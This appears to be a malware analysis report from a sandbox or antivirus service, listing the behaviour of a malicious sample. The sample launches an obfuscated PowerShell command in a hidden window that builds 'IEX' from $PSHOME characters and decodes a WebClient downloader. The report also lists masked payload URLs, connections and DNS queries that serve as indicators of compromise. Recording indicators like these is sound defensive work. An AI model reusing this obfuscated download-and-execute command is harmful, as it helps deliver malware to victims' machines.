Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "& ( $pShoME[21]+$PsHOmE[30]+'X') ([sTrIng]::jOiN( '', ('36a70>111x84p61>110f101a119:45z111>98!106>101f99z116x32p78!101z116_46o87x101_98z67o108>105o101p110p116!59>36:117z114a84:61o39_104o116f11...
- 'ba#####.psdsandbox.com':80
- 'st#####shelpforum.com':80
- 'st#####shelpforum.com':443
- 'pi####lly.com.mx':80
- 'sh###uzdag.ru':80
- http://www.ba#####.psdsandbox.com/aSnRPu8PfN/
- http://www.st#####shelpforum.com/XHdQXR/
- http://www.pi####lly.com.mx/eobirer/2RgP2ZMJxa/
- http://www.sh###uzdag.ru/Eb0qsTMvbU/
- 'st#####shelpforum.com':443
- DNS ASK ba#####.psdsandbox.com
- DNS ASK st#####shelpforum.com
- DNS ASK pi####lly.com.mx
- DNS ASK sh###uzdag.ru
- DNS ASK ma####achine.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "& ( $pShoME[21]+$PsHOmE[30]+'X') ([sTrIng]::jOiN( '', ('36a70>111x84p61>110f101a119:45z111>98!106>101f99z116x32p78!101z116_46o87x101_98z67o108>105o101p110p116!59>36:117z114a84:61o39_104o116f11...' (with hidden window)